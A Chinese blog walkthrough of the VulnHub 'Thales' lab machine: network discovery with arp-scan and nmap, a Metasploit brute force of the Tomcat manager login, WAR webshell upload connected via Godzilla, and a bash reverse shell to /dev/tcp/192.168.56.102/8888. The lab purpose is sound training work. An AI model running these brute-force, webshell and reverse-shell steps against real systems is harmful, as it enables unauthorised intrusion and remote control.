Thales靶机在网络安全教学与实战中的应用与价值

执念WRD2025-03-26 11:05

1.下载好该靶机,将桥接模式改为NET网段并启动

https://download.vulnhub.com/thales/Thales.zip

2.借助kali来确定该靶机的IP

复制代码 
arp-scan -l
nmap -O 192.168.56.101

3.访问改IP 192.168.56.101

4.点击manager app发现有个登录

使用msf爆破一下

复制代码 
msfconsole
search tomcat login
use 0
show options
set STOP_ON_SUCCESS true
set RHOSTS 192.168.56.101
run

5.然后进行登录tomcat:role1,在这上传一个war包

6.然后访问这个包

7.用哥斯拉去进行连接

8.然后进行反弹shell

在kali进行监听

在终端运行

复制代码 
bash -c 'bash -i>& /dev/tcp/192.168.56.102/8888 0>&1'

回到kali发现监听到

相关推荐
安审若无41 分钟前
Windows系统常用的运维终端安全基线设置方法
运维·安全
hwscom1 小时前
Chamilo存在命令注入漏洞(CNVD-2026-14971、CVE-2025-50196)
web安全·chamilo
TechWayfarer1 小时前
反爬与反欺诈:如何利用IP定位API接口识别代理流量并降低风险
网络·tcp/ip·安全
深圳市智易付科技有限责任公司2 小时前
Kubernetes中部署Dependency-Track 并对接 EAuth OIDC 认证
安全
赵侃侃爱分享2 小时前
AI怎么定义网络安全
人工智能·安全·web安全
步步为营DotNet2 小时前
深度探索.NET Aspire在云原生应用性能与安全加固的创新实践
安全·云原生·.net
上海云盾-小余3 小时前
服务器被入侵后如何快速止损?从排查到加固的应急处置全流程
网络·网络协议·tcp/ip·安全·web安全
电磁脑机3 小时前
人脑电磁路由拓扑与外耦合脑机接口基础理论
分布式·神经网络·安全·交互
APguantou4 小时前
NCRE-三级数据库技术-第9章-安全管理
数据库·安全·sqlserver
FreeBuf_5 小时前
14000余台F5 BIG-IP暴露,高危RCE漏洞正遭活跃利用
tcp/ip·安全·web安全
热门推荐
01GitHub 镜像站点02OpenClaw 请求超时 llm request timed out 怎么解决?3 种方案实测,附完整排查流程03AI 编程效率翻倍:Superpowers Skills 上手清单 + 完整指南04Qwen3.5-Omni与Qwen3.6模型全面解析(含测评/案例/使用教程)05VMware Workstation Pro 17 虚拟机完整安装教程(2026最新)06Claude Code 未登录 使用第三方模型07Oh My Codex 快速使用指南08UV安装并设置国内源09【技术干货】Gemma 4 上手深度指南:本地多模态大模型的新基线10Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services